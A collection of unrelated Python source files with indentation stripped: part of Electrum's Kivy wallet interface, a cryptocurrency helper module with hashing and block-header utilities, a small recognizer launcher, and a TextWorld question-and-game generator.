Logger.info('Time to on_start: {} <<<<<<<<'.format(time.clock()))
win = Window
win.bind(size=self.on_size, on_keyboard=self.on_keyboard)
win.bind(on_key_down=self.on_key_down)
#win.softinput_mode = 'below_target'
self.on_size(win, win.size)
self.init_ui()
crash_reporter.ExceptionHook(self)
# init plugins
run_hook('init_kivy', self)
# fiat currency
self.fiat_unit = self.fx.ccy if self.fx.is_enabled() else ''
# default tab
self.switch_to('history')
# bind intent for bitcoin: URI scheme
if platform == 'android':
from android import activity
from jnius import autoclass
PythonActivity = autoclass('org.kivy.android.PythonActivity')
mactivity = PythonActivity.mActivity
self.on_new_intent(mactivity.getIntent())
activity.bind(on_new_intent=self.on_new_intent)
# connect callbacks
if self.network:
interests = ['wallet_updated', 'network_updated', 'blockchain_updated',
'status', 'new_transaction', 'verified']
self.network.register_callback(self.on_network_event, interests)
self.network.register_callback(self.on_fee, ['fee'])
self.network.register_callback(self.on_fee_histogram, ['fee_histogram'])
self.network.register_callback(self.on_quotes, ['on_quotes'])
self.network.register_callback(self.on_history, ['on_history'])
# load wallet
self.load_wallet_by_name(self.electrum_config.get_wallet_path())
# URI passed in config
uri = self.electrum_config.get('url')
if uri:
self.set_URI(uri)
def get_wallet_path(self):
if self.wallet:
return self.wallet.storage.path
else:
return ''
def on_wizard_complete(self, wizard, wallet):
if wallet: # wizard returned a wallet
wallet.start_network(self.daemon.network)
self.daemon.add_wallet(wallet)
self.load_wallet(wallet)
elif not self.wallet:
# wizard did not return a wallet; and there is no wallet open atm
# try to open last saved wallet (potentially start wizard again)
self.load_wallet_by_name(self.electrum_config.get_wallet_path(), ask_if_wizard=True)
def load_wallet_by_name(self, path, ask_if_wizard=False):
if not path:
return
if self.wallet and self.wallet.storage.path == path:
return
wallet = self.daemon.load_wallet(path, None)
if wallet:
if wallet.has_password():
self.password_dialog(wallet, _('Enter PIN code'), lambda x: self.load_wallet(wallet), self.stop)
else:
self.load_wallet(wallet)
else:
def launch_wizard():
storage = WalletStorage(path, manual_upgrades=True)
wizard = Factory.InstallWizard(self.electrum_config, self.plugins, storage)
wizard.bind(on_wizard_complete=self.on_wizard_complete)
action = wizard.storage.get_action()
wizard.run(action)
if not ask_if_wizard:
launch_wizard()
else:
from .uix.dialogs.question import Question
def handle_answer(b: bool):
if b:
launch_wizard()
else:
try: os.unlink(path)
except FileNotFoundError: pass
self.stop()
d = Question(_('Do you want to launch the wizard again?'), handle_answer)
d.open()
def on_stop(self):
Logger.info('on_stop')
if self.wallet:
self.electrum_config.save_last_wallet(self.wallet)
self.stop_wallet()
def stop_wallet(self):
if self.wallet:
self.daemon.stop_wallet(self.wallet.storage.path)
self.wallet = None
def on_key_down(self, instance, key, keycode, codepoint, modifiers):
if 'ctrl' in modifiers:
# q=24 w=25
if keycode in (24, 25):
self.stop()
elif keycode == 27:
# r=27
# force update wallet
self.update_wallet()
elif keycode == 112:
# pageup
#TODO move to next tab
pass
elif keycode == 117:
# pagedown
#TODO move to prev tab
pass
#TODO: alt+tab_number to activate the particular tab
def on_keyboard(self, instance, key, keycode, codepoint, modifiers):
if key == 27 and self.is_exit is False:
self.is_exit = True
self.show_info(_('Press again to exit'))
return True
# override settings button
if key in (319, 282): #f1/settings button on android
#self.gui.main_gui.toggle_settings(self)
return True
def settings_dialog(self):
from .uix.dialogs.settings import SettingsDialog
if self._settings_dialog is None:
self._settings_dialog = SettingsDialog(self)
self._settings_dialog.update()
self._settings_dialog.open()
def popup_dialog(self, name):
if name == 'settings':
self.settings_dialog()
elif name == 'wallets':
from .uix.dialogs.wallets import WalletDialog
d = WalletDialog()
d.open()
elif name == 'status':
popup = Builder.load_file('electrum/gui/kivy/uix/ui_screens/'+name+'.kv')
master_public_keys_layout = popup.ids.master_public_keys
for xpub in self.wallet.get_master_public_keys()[1:]:
master_public_keys_layout.add_widget(TopLabel(text=_('Master Public Key')))
ref = RefLabel()
ref.name = _('Master Public Key')
ref.data = xpub
master_public_keys_layout.add_widget(ref)
popup.open()
else:
popup = Builder.load_file('electrum/gui/kivy/uix/ui_screens/'+name+'.kv')
popup.open()
@profiler
def init_ui(self):
''' Initialize the UX part of Electrum. This function performs the basic
tasks of setting up the UI.
'''
#from weakref import ref
self.funds_error = False
# setup UX
self.screens = {}
#setup lazy imports for mainscreen
Factory.register('AnimatedPopup',
module='electrum.gui.kivy.uix.dialogs')
Factory.register('QRCodeWidget',
module='electrum.gui.kivy.uix.qrcodewidget')
# preload widgets. Remove this if you want to load the widgets on demand
#Cache.append('electrum_widgets', 'AnimatedPopup', Factory.AnimatedPopup())
#Cache.append('electrum_widgets', 'QRCodeWidget', Factory.QRCodeWidget())
# load and focus the ui
self.root.manager = self.root.ids['manager']
self.history_screen = None
self.contacts_screen = None
self.send_screen = None
self.invoices_screen = None
self.receive_screen = None
self.requests_screen = None
self.address_screen = None
self.icon = "icons/electrum.png"
self.tabs = self.root.ids['tabs']
def update_interfaces(self, dt):
net_params = self.network.get_parameters()
self.num_nodes = len(self.network.get_interfaces())
self.num_chains = len(self.network.get_blockchains())
chain = self.network.blockchain()
self.blockchain_forkpoint = chain.get_max_forkpoint()
self.blockchain_name = chain.get_name()
interface = self.network.interface
if interface:
self.server_host = interface.host
else:
self.server_host = str(net_params.host) + ' (connecting...)'
self.proxy_config = net_params.proxy or {}
self.update_proxy_str(self.proxy_config)
def on_network_event(self, event, *args):
Logger.info('network event: '+ event)
if event == 'network_updated':
self._trigger_update_interfaces()
self._trigger_update_status()
elif event == 'wallet_updated':
self._trigger_update_wallet()
self._trigger_update_status()
elif event == 'blockchain_updated':
# to update number of confirmations in history
self._trigger_update_wallet()
elif event == 'status':
self._trigger_update_status()
elif event == 'new_transaction':
self._trigger_update_wallet()
elif event == 'verified':
self._trigger_update_wallet()
@profiler
def load_wallet(self, wallet):
if self.wallet:
self.stop_wallet()
self.wallet = wallet
self.wallet_name = wallet.basename()
self.update_wallet()
# Once GUI has been initialized check if we want to announce something
# since the callback has been called before the GUI was initialized
if self.receive_screen:
self.receive_screen.clear()
self.update_tabs()
run_hook('load_wallet', wallet, self)
try:
wallet.try_detecting_internal_addresses_corruption()
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
def update_status(self, *dt):
if not self.wallet:
return
if self.network is None or not self.network.is_connected():
status = _("Offline")
elif self.network.is_connected():
self.num_blocks = self.network.get_local_height()
server_height = self.network.get_server_height()
server_lag = self.num_blocks - server_height
if not self.wallet.up_to_date or server_height == 0:
status = _("Synchronizing...")
elif server_lag > 1:
status = _("Server lagging")
else:
status = ''
else:
status = _("Disconnected")
if status:
self.balance = status
self.fiat_balance = status
else:
c, u, x = self.wallet.get_balance()
text = self.format_amount(c+x+u)
self.balance = str(text.strip()) + ' [size=22dp]%s[/size]'% self.base_unit
self.fiat_balance = self.fx.format_amount(c+u+x) + ' [size=22dp]%s[/size]'% self.fx.ccy
def get_max_amount(self):
from electrum.transaction import TxOutput
if run_hook('abort_send', self):
return ''
inputs = self.wallet.get_spendable_coins(None, self.electrum_config)
if not inputs:
return ''
addr = str(self.send_screen.screen.address) or self.wallet.dummy_address()
outputs = [TxOutput(TYPE_ADDRESS, addr, '!')]
try:
tx = self.wallet.make_unsigned_transaction(inputs, outputs, self.electrum_config)
except NoDynamicFeeEstimates as e:
Clock.schedule_once(lambda dt, bound_e=e: self.show_error(str(bound_e)))
return ''
except NotEnoughFunds:
return ''
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
return ''
amount = tx.output_value()
__, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
amount_after_all_fees = amount - x_fee_amount
return format_satoshis_plain(amount_after_all_fees, self.decimal_point())
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, 0, self.decimal_point(), is_diff=is_diff, whitespaces=whitespaces)
def format_amount_and_units(self, x):
return format_satoshis_plain(x, self.decimal_point()) + ' ' + self.base_unit
#@profiler
def update_wallet(self, *dt):
self._trigger_update_status()
if self.wallet and (self.wallet.up_to_date or not self.network or not self.network.is_connected()):
self.update_tabs()
def notify(self, message):
try:
global notification, os
if not notification:
from plyer import notification
icon = (os.path.dirname(os.path.realpath(__file__))
+ '/../../' + self.icon)
notification.notify('Electrum', message,
app_icon=icon, app_name='Electrum')
except ImportError:
Logger.error('Notification: needs plyer; `sudo python3 -m pip install plyer`')
def on_pause(self):
self.pause_time = time.time()
# pause nfc
if self.nfcscanner:
self.nfcscanner.nfc_disable()
return True
def on_resume(self):
now = time.time()
if self.wallet and self.wallet.has_password() and now - self.pause_time > 60:
self.password_dialog(self.wallet, _('Enter PIN'), None, self.stop)
if self.nfcscanner:
self.nfcscanner.nfc_enable()
def on_size(self, instance, value):
width, height = value
self._orientation = 'landscape' if width > height else 'portrait'
self._ui_mode = 'tablet' if min(width, height) > inch(3.51) else 'phone'
def on_ref_label(self, label, touch):
if label.touched:
label.touched = False
self.qr_dialog(label.name, label.data, True)
else:
label.touched = True
self._clipboard.copy(label.data)
Clock.schedule_once(lambda dt: self.show_info(_('Text copied to clipboard.\nTap again to display it as QR code.')))
def set_send(self, address, amount, label, message):
self.send_payment(address, amount=amount, label=label, message=message)
def show_error(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, icon='atlas://electrum/gui/kivy/theming/light/error', duration=0,
modal=False):
''' Show an error Message Bubble.
'''
self.show_info_bubble( text=error, icon=icon, width=width,
pos=pos or Window.center, arrow_pos=arrow_pos, exit=exit,
duration=duration, modal=modal)
def show_info(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, duration=0, modal=False):
''' Show an Info Message Bubble.
'''
self.show_error(error, icon='atlas://electrum/gui/kivy/theming/light/important',
duration=duration, modal=modal, exit=exit, pos=pos,
arrow_pos=arrow_pos)
def show_info_bubble(self, text=_('Hello World'), pos=None, duration=0,
arrow_pos='bottom_mid', width=None, icon='', modal=False, exit=False):
'''Method to show an Information Bubble
.. parameters::
text: Message to be displayed
pos: position for the bubble
duration: duration the bubble remains on screen. 0 = click to hide
width: width of the Bubble
arrow_pos: arrow position for the bubble
'''
info_bubble = self.info_bubble
if not info_bubble:
info_bubble = self.info_bubble = Factory.InfoBubble()
win = Window
if info_bubble.parent:
win.remove_widget(info_bubble
if not info_bubble.modal else
info_bubble._modal_view)
if not arrow_pos:
info_bubble.show_arrow = False
else:
info_bubble.show_arrow = True
info_bubble.arrow_pos = arrow_pos
img = info_bubble.ids.img
if text == 'texture':
# icon holds a texture not a source image
# display the texture in full screen
text = ''
img.texture = icon
info_bubble.fs = True
info_bubble.show_arrow = False
img.allow_stretch = True
info_bubble.dim_background = True
info_bubble.background_image = 'atlas://electrum/gui/kivy/theming/light/card'
else:
info_bubble.fs = False
info_bubble.icon = icon
#if img.texture and img._coreimage:
# img.reload()
img.allow_stretch = False
info_bubble.dim_background = False
info_bubble.background_image = 'atlas://data/images/defaulttheme/bubble'
info_bubble.message = text
if not pos:
pos = (win.center[0], win.center[1] - (info_bubble.height/2))
info_bubble.show(pos, duration, width, modal=modal, exit=exit)
def tx_dialog(self, tx):
from .uix.dialogs.tx_dialog import TxDialog
d = TxDialog(self, tx)
d.open()
def sign_tx(self, *args):
threading.Thread(target=self._sign_tx, args=args).start()
def _sign_tx(self, tx, password, on_success, on_failure):
try:
self.wallet.sign_transaction(tx, password)
except InvalidPassword:
Clock.schedule_once(lambda dt: on_failure(_("Invalid PIN")))
return
on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
Clock.schedule_once(lambda dt: on_success(tx))
def _broadcast_thread(self, tx, on_complete):
try:
self.network.run_from_another_thread(self.network.broadcast_transaction(tx))
except Exception as e:
ok, msg = False, repr(e)
else:
ok, msg = True, tx.txid()
Clock.schedule_once(lambda dt: on_complete(ok, msg))
def broadcast(self, tx, pr=None):
def on_complete(ok, msg):
if ok:
self.show_info(_('Payment sent.'))
if self.send_screen:
self.send_screen.do_clear()
if pr:
self.wallet.invoices.set_paid(pr, tx.txid())
self.wallet.invoices.save()
self.update_tab('invoices')
else:
display_msg = _('The server returned an error when broadcasting the transaction.')
if msg:
display_msg += '\n' + msg
display_msg = display_msg[:500]
self.show_error(display_msg)
if self.network and self.network.is_connected():
self.show_info(_('Sending'))
threading.Thread(target=self._broadcast_thread, args=(tx, on_complete)).start()
else:
self.show_info(_('Cannot broadcast transaction') + ':\n' + _('Not connected'))
def description_dialog(self, screen):
from .uix.dialogs.label_dialog import LabelDialog
text = screen.message
def callback(text):
screen.message = text
d = LabelDialog(_('Enter description'), text, callback)
d.open()
def amount_dialog(self, screen, show_max):
from .uix.dialogs.amount_dialog import AmountDialog
amount = screen.amount
if amount:
amount, u = str(amount).split()
assert u == self.base_unit
def cb(amount):
screen.amount = amount
popup = AmountDialog(show_max, amount, cb)
popup.open()
def invoices_dialog(self, screen):
from .uix.dialogs.invoices import InvoicesDialog
if len(self.wallet.invoices.sorted_list()) == 0:
self.show_info(' '.join([
_('No saved invoices.'),
_('Signed invoices are saved automatically when you scan them.'),
_('You may also save unsigned requests or contact addresses using the save button.')
]))
return
popup = InvoicesDialog(self, screen, None)
popup.update()
popup.open()
def requests_dialog(self, screen):
from .uix.dialogs.requests import RequestsDialog
if len(self.wallet.get_sorted_requests(self.electrum_config)) == 0:
self.show_info(_('No saved requests.'))
return
popup = RequestsDialog(self, screen, None)
popup.update()
popup.open()
def addresses_dialog(self, screen):
from .uix.dialogs.addresses import AddressesDialog
popup = AddressesDialog(self, screen, None)
popup.update()
popup.open()
def fee_dialog(self, label, dt):
from .uix.dialogs.fee_dialog import FeeDialog
def cb():
self.fee_status = self.electrum_config.get_fee_status()
fee_dialog = FeeDialog(self, self.electrum_config, cb)
fee_dialog.open()
def on_fee(self, event, *arg):
self.fee_status = self.electrum_config.get_fee_status()
def protected(self, msg, f, args):
if self.wallet.has_password():
on_success = lambda pw: f(*(args + (pw,)))
self.password_dialog(self.wallet, msg, on_success, lambda: None)
else:
f(*(args + (None,)))
def delete_wallet(self):
from .uix.dialogs.question import Question
basename = os.path.basename(self.wallet.storage.path)
d = Question(_('Delete wallet?') + '\n' + basename, self._delete_wallet)
d.open()
def _delete_wallet(self, b):
if b:
basename = self.wallet.basename()
self.protected(_("Enter your PIN code to confirm deletion of {}").format(basename), self.__delete_wallet, ())
def __delete_wallet(self, pw):
wallet_path = self.get_wallet_path()
dirname = os.path.dirname(wallet_path)
basename = os.path.basename(wallet_path)
if self.wallet.has_password():
try:
self.wallet.check_password(pw)
except:
self.show_error("Invalid PIN")
return
self.stop_wallet()
os.unlink(wallet_path)
self.show_error(_("Wallet removed: {}").format(basename))
new_path = self.electrum_config.get_wallet_path()
self.load_wallet_by_name(new_path)
def show_seed(self, label):
self.protected(_("Enter your PIN code in order to decrypt your seed"), self._show_seed, (label,))
def _show_seed(self, label, password):
if self.wallet.has_password() and password is None:
return
keystore = self.wallet.keystore
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except:
self.show_error("Invalid PIN")
return
label.text = _('Seed') + ':\n' + seed
if passphrase:
label.text += '\n\n' + _('Passphrase') + ': ' + passphrase
def password_dialog(self, wallet, msg, on_success, on_failure):
from .uix.dialogs.password_dialog import PasswordDialog
if self._password_dialog is None:
self._password_dialog = PasswordDialog()
self._password_dialog.init(self, wallet, msg, on_success, on_failure)
self._password_dialog.open()
def change_password(self, cb):
from .uix.dialogs.password_dialog import PasswordDialog
if self._password_dialog is None:
self._password_dialog = PasswordDialog()
message = _("Changing PIN code.") + '\n' + _("Enter your current PIN:")
def on_success(old_password, new_password):
self.wallet.update_password(old_password, new_password)
self.show_info(_("Your PIN code was updated"))
on_failure = lambda: self.show_error(_("PIN codes do not match"))
self._password_dialog.init(self, self.wallet, message, on_success, on_failure, is_change=1)
self._password_dialog.open()
def export_private_keys(self, pk_label, addr):
if self.wallet.is_watching_only():
self.show_info(_('This is a watching-only wallet. It does not contain private keys.'))
return
def show_private_key(addr, pk_label, password):
if self.wallet.has_password() and password is None:
return
if not self.wallet.can_export():
return
try:
key = str(self.wallet.export_private_key(addr, password)[0])
pk_label.data = key
except InvalidPassword:
self.show_error("Invalid PIN")
return
self.protected(_("Enter your PIN code in order to decrypt your private key"), show_private_key, (addr, pk_label))
|
__init__.py
|
# The MIT License (MIT)
#
# Copyright (c) 2014 Richard Moore
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
import hashlib
import json
import math
import os
import struct
import time
import threading
import urllib2
from . import base58
from . import bootstrap
from . import ecc
from . import key
from . import piecewise
from .hash import sha1, sha256, sha256d, ripemd160, hash160
__all__ = [
'base58', 'ecc', 'key', 'piecewise',
'sha1', 'sha256', 'sha256d', 'ripemd160', 'hash160',
'scrypt',
'hex_to_bin', 'bin_to_hex',
'get_version', 'make_version',
'default_data_directory'
# TODO: add others for import *
]
# Try finding a fast implementation of scrypt, falling back to pyscrypt
try:
import scrypt
_scrypt = scrypt.hash
except Exception, e:
import pyscrypt
_scrypt = pyscrypt.hash
# Hashing Algorithms
def scrypt(data, salt, N, r, p, dk_length):
return _scrypt(data, salt, N, r, p, dk_length)
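# Hedged usage sketch (the parameter values below are illustrative assumptions,
# not taken from this module): Litecoin-style proof-of-work typically calls
# scrypt(header_bytes, header_bytes, N=1024, r=1, p=1, dk_length=32),
# using the 80-byte block header as both the message and the salt.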
def x11(data):
raise NotImplementedError()
# Formatting Helpers
def commify(value):
return "{:,d}".format(value)
# Block Header Helpers
def get_block_header(version, prev_block, merkle_root, timestamp, bits, nonce):
return struct.pack('<I32s32sIII', version, prev_block, merkle_root, timestamp, bits, nonce)
def verify_target(coin, block_header):
binary_header = block_header.binary()[:80]
pow = coin.proof_of_work(binary_header)[::-1]
return pow <= get_target(block_header.bits)
def get_target(bits):
target = ((bits & 0x7fffff) * 2 ** (8 * ((bits >> 24) - 3)))
return ("%064x" % target).decode('hex')
DifficultyOneTarget = 26959535291011309493156476344723991336010898738574164086137773096960.0
def get_difficulty(bits):
return DifficultyOneTarget / ((bits & 0x7fffff) * 2 ** (8 * ((bits >> 24) - 3)))
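# Worked example using the well-known difficulty-1 compact bits:
# bits = 0x1d00ffff -> mantissa 0x00ffff, exponent 0x1d (29), so
# target = 0xffff * 2**(8 * (29 - 3)) = 0xffff * 2**208, and
# get_difficulty(0x1d00ffff) == DifficultyOneTarget / target == 1.0.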
# https://en.bitcoin.it/wiki/Protocol_specification#Merkle_Trees
def get_merkle_root(transactions):
branches = [t.hash for t in transactions]
while len(branches) > 1:
if (len(branches) % 2) == 1:
branches.append(branches[-1])
branches = [sha256d(a + b) for (a, b) in zip(branches[0::2], branches[1::2])]
return branches[0]
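# Example of the odd-count rule above: for three transaction hashes [a, b, c],
# the last hash is duplicated, so the pairs are (a, b) and (c, c) and the root
# is sha256d(sha256d(a + b) + sha256d(c + c)).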
# Hexlify Helpers
def hex_to_bin(data):
return data.decode('hex')[::-1]
def bin_to_hex(data):
return data[::-1].encode('hex')
# Protocol Version Helpers
def get_version(version):
major = version // 1000000
minor = (version // 10000) % 100
revision = (version // 100) % 100
build = version % 100
return (major, minor, revision, build)
def make_version(major, minor, revision, build):
if not ((0 <= minor < 100) and (0 <= revision < 100) and (0 <= build < 100)):
raise ValueError('minor, revision and build must be in the range [0, 99]')
return (major * 1000000) + (minor * 10000) + (revision * 100) + build
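# Worked example of the packing scheme: make_version(0, 9, 2, 1) == 90201 and
# get_version(90201) == (0, 9, 2, 1).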
# File Helpers
def default_data_directory():
return os.path.expanduser('~/.pycoind/data')
# QR Code
#def qrcode(data, box_size = 10, border = 4, lmqh = 'M'):
# import cStringIO as StringIO
# ec = dict(L = 1, M = 0, Q = 3, H = 2)
# qr = QRCode(box_size = box_size, border = border)
# qr.add_data(data)
# qr.make(fit = True, image_factory = PymagingImage)
# img = make_img()
# print img
# return 'foo'
def fetch_url_json_path_int(url, path):
def func():
request = urllib2.Request(url, headers = {'User-Agent': 'pycoind'})
payload = urllib2.urlopen(request).read()
try:
data = json.loads(payload)
for component in path.split('/'):
if isinstance(data, dict):
data = data[component]
elif isinstance(data, (list, tuple)):
data = data[int(component)]
else:
return None
return int(data)
except Exception, e:
print e
return None
return func
def fetch_url_int(url):
def func():
request = urllib2.Request(url, headers = {'User-Agent': 'pycoind'})
try:
return int(urllib2.urlopen(request).read())
except Exception, e:
print e
return None
return func
def guess_block_height(coin, timeout = 5.0):
result = dict()
lock = threading.Lock()
#user_agent = 'pycoind/%s' % '.'.join(str(v) for v in VERSION)
def get_block_height(name, func):
try:
block_height = func()
with lock:
result[name] = block_height
except Exception, e:
print e
threads = []
for (name, func) in coin.block_height_guess:
thread = threading.Thread(target = get_block_height, args = (name, func))
thread.daemon = True
thread.start()
threads.append(thread)
t0 = time.time()
for thread in threads:
wait_time = timeout - (time.time() - t0)
if wait_time < 0: break
thread.join(wait_time)
# we copy, so lingering threads don't sneak new info in without a lock
with lock:
return result.copy()
|
recognizer.py
|
import sys
import threading
from lang_recognizer import LangEngine
from image_recognizer import ImageEngine
def lang(cmd):
print('start LangEngine')
le = LangEngine()
le.main(cmd)
def image():
print('start ImageEngine')
ie = ImageEngine()
while not event_stop.is_set():
ie.main()
if __name__=='__main__':
if len(sys.argv) == 1:
print('Please select a startup mode.')
print('Text mode: python recognizer.py text')
print('Audio input mode: python recognizer.py audio')
print('Image recognition mode: python recognizer.py [mode] 1')
sys.exit()
event_stop = threading.Event()
if len(sys.argv) == 3:
imge = threading.Thread(target=image,name="img",args=())
imge.start()
lang(sys.argv[1])
event_stop.set()
|
game_generator.py
|
import numpy as np
import random
import uuid
import os
import time
import multiprocessing as mp
from os.path import join as pjoin
# Set of fake words
with open("vocabularies/fake_words.txt") as f:
FAKE_WORDS = f.read().lower().split("\n")
FAKE_WORDS = set(FAKE_WORDS)
# set of all entities/objects
with open("vocabularies/entities.txt") as f:
ALL_ENTITIES = f.read().lower().split("\n")
ALL_ENTITIES = set(ALL_ENTITIES)
########################################################## question generator
def attribute_to_question(attr, object_name):
"""
creates the text question for attribute and object.
:param attr: the attribute to create question about.
:param object_name: the object to ask about.
:return res: the question.
"""
if attr == "edible":
res = "is " + object_name + " edible ?"
elif attr == "drinkable":
res = "is " + object_name + " drinkable ?"
elif attr == "portable":
res = "can one put " + object_name + " into pocket ?"
elif attr == "openable":
res = "is it possible to open " + object_name + " ?"
elif attr == "cuttable":
res = "can " + object_name + " be cut ?"
elif attr == "sharp":
res = "can one cut anything with a " + object_name + " ?"
elif attr == "heat_source":
res = "can one cook things with the " + object_name + " ?"
elif attr == "cookable":
res = "can the " + object_name + " be cooked ?"
elif attr == "holder":
res = "can " + object_name + " hold things ?"
else:
print("Unknown: {}".format(attr))
raise NotImplementedError
return res
def generate_location_question(entity_dict, seed=None):
"""
Generate a random question about object location based on environment
:param entity_dict: dictionary of objects and their locations in environment. {entity: location}
:return : random question about object location in world
"""
# entity_dict is a dict of {entity: location}
entities, locations = [], []
for item in entity_dict:
if item == "" or entity_dict[item] == "":
continue
loc = entity_dict[item]
item, loc = item.lower(), loc.lower()
# use most immediate container as answer
if "." in loc:
loc = loc.rsplit(".")[-1]
# filter out multi-word locations
if " " in loc:
continue
entities.append(item)
locations.append(loc)
if seed is not None:
np.random.seed(seed)
idx = np.random.randint(low=0, high=len(entities))
return "where is the " + entities[idx] + " ?", locations[idx], entities[idx]
def generate_attribute_question(entity_dict, seed=None):
"""
Generate random attribute question about environment
:param entity_dict: is a dict of {entity: attribute}
:return: text question about attribute.
:return answer: the answer to the question.
:return random_attr: the attribute chosen to ask about.
:return entity_: the object chosen to ask about.
"""
# entity_dict is a dict of {entity: attribute}
if seed is not None:
np.random.seed(seed)
all_attributes = set(["edible", "drinkable", "portable", "openable",
"cuttable", "sharp", "heat_source", "cookable",
"holder"])
all_entities = set()
attribute_dict = dict()
for item in entity_dict:
if item not in FAKE_WORDS:
continue
attrs_of_this_obj = list(set(entity_dict[item]) & all_attributes)
for attr in attrs_of_this_obj:
if attr not in attribute_dict:
attribute_dict[attr] = set()
attribute_dict[attr].add(item)
all_entities.add(item)
all_attributes = sorted([key for key in attribute_dict])
random_attr = np.random.choice(all_attributes)
entity_true = attribute_dict[random_attr]
entity_false = sorted(all_entities - entity_true)
entity_true = sorted(entity_true)
if len(entity_false) == 0 or len(entity_true) == 0:
assert False, "Contact Marc if this happens!"
#if seed is not None:
# seed = seed + 1
# return generate_attribute_question(entity_dict, seed)
if np.random.rand() > 0.5:
answer = "1"
entity_ = np.random.choice(entity_true)
else:
answer = "0"
entity_ = np.random.choice(entity_false)
return attribute_to_question(random_attr, entity_), answer, random_attr, entity_
def generate_existence_question(entity_dict, seed=None):
"""
Generate a random question about an objects existence.
:param entity_dict: dictionary about objects locations in the form {entity: location}
:return : text question about object existence.
"""
# entity_dict is a dict of {entity: location}
entities_in_this_game = []
for item in entity_dict:
item = item.lower()
if item == "" or entity_dict[item] == "":
continue
entities_in_this_game.append(item)
entities_not_in_this_game = list(ALL_ENTITIES - set(entities_in_this_game) - FAKE_WORDS)
if seed is not None:
np.random.seed(seed)
if np.random.rand() > 0.5:
entity = np.random.choice(entities_in_this_game)
return "is there any " + entity + " in the world ?", "1", entity
else:
entity = np.random.choice(entities_not_in_this_game)
return "is there any " + entity + " in the world ?", "0", entity
def generate_qa_pairs(infos, question_type="location", seed=42):
"""
Generate question answer pairs based on environment info and question type for each game in batch.
:param infos: Gym Environment infos dictionary containing specific information about the environment.
:param question_type: The type of question to generate.
:return output_questions: list of the output questions.
:return output_answers: list of the output answers.
:return reward_helper_info: dictionary containing relevant question and environment information for reward shaping.
"""
output_questions, output_answers = [], []
reward_helper_info = {"batch_size": len(infos["extra.object_locations"]),
"_entities": [],
"_answers": [],
"_attributes": []}
# For each environment in the batch
for i in range(len(infos["extra.object_locations"])):
if question_type == "location":
_q, _a, _e = generate_location_question(infos["extra.object_locations"][i], seed=seed * len(infos["extra.object_locations"]) + i)
elif question_type == "attribute":
_q, _a, _attr, _e = generate_attribute_question(infos["extra.object_attributes"][i], seed=seed * len(infos["extra.object_locations"]) + i)
reward_helper_info["_attributes"].append(_attr)
elif question_type == "existence":
_q, _a, _e = generate_existence_question(infos["extra.object_locations"][i], seed=seed * len(infos["extra.object_locations"]) + i)
else:
raise NotImplementedError
output_questions.append(_q)
output_answers.append(_a)
reward_helper_info["_entities"].append(_e) # the entity being asked
reward_helper_info["_answers"].append(_a) # the entity being asked
return output_questions, output_answers, reward_helper_info
########################################################## game generator
def generate_fixed_map_games(p_num, path="./", question_type="location", random_seed=None, num_object=None):
"""
Generate a fixed map game
:param p_num: used in random name creation for game.
:param path: path to create gamefile.
:param question_type: used only to decide whether or not to use placeholders in game creation
:param num_object: number of objects to create in world.
:return gamefile: the directory of the created textworld gamefile
"""
if random_seed is None:
np.random.seed()
else:
np.random.seed(random_seed)
# generate fixed map games
map_seed = 123
num_room = 6
if num_object is None:
num_object = np.random.randint(low=num_room * 3, high=num_room * 6 + 1)
if random_seed is None:
random_seed = np.random.randint(100000000)
with_placeholders = question_type == "attribute"
random_game_name = str(uuid.uuid1()) + str(p_num)
config_list = [str(num_room), str(num_object), str(map_seed), str(with_placeholders), str(random_seed)]
random_game_name += "_config_" + "_".join(config_list)
gamefile = pjoin(path, "game_" + random_game_name + ".ulx")
cmd = "tw-make tw-iqa --nb-rooms " + str(num_room) + " --nb-entities " + str(num_object) + " --seed-map " + str(map_seed) + (" --with-placeholders" if with_placeholders else "") +\
" --third-party challenge.py --seed " + str(random_seed) + " --output " + gamefile + " --silent --kb " + pjoin(path, "textworld_data")
os.system(cmd)
return gamefile
def generate_random_map_games(p_num, path="./", question_type="location", random_seed=None, num_room=None, num_object=None):
"""
Generate a random map game
:param p_num: used in random name creation for game.
:param path: path to create gamefile.
:param question_type: used only to decide whether or not to use placeholders in game creation
:param num_room: number of rooms to create in world.
:param num_object: number of objects to create in world.
:return gamefile: the directory of the created textworld gamefile
"""
if random_seed is None:
np.random.seed()
else:
np.random.seed(random_seed)
# generate random map games
num_room_lower_bound = 2
num_room_upper_bound = 12
if num_room is None:
num_room = np.random.randint(low=num_room_lower_bound, high=num_room_upper_bound + 1)
with_placeholders = question_type == "attribute"
if with_placeholders:
num_room = max(num_room, 2) # Placeholder option requires at least two rooms.
if num_object is None:
num_object = np.random.randint(low=num_room * 3, high=num_room * 6 + 1)
if random_seed is None:
random_seed = np.random.randint(100000000)
map_seed = random_seed
random_game_name = str(uuid.uuid1()) + str(p_num)
config_list = [str(num_room), str(num_object), str(map_seed), str(with_placeholders), str(random_seed)]
random_game_name += "_config_" + "_".join(config_list)
gamefile = pjoin(path, "game_" + random_game_name + ".ulx")
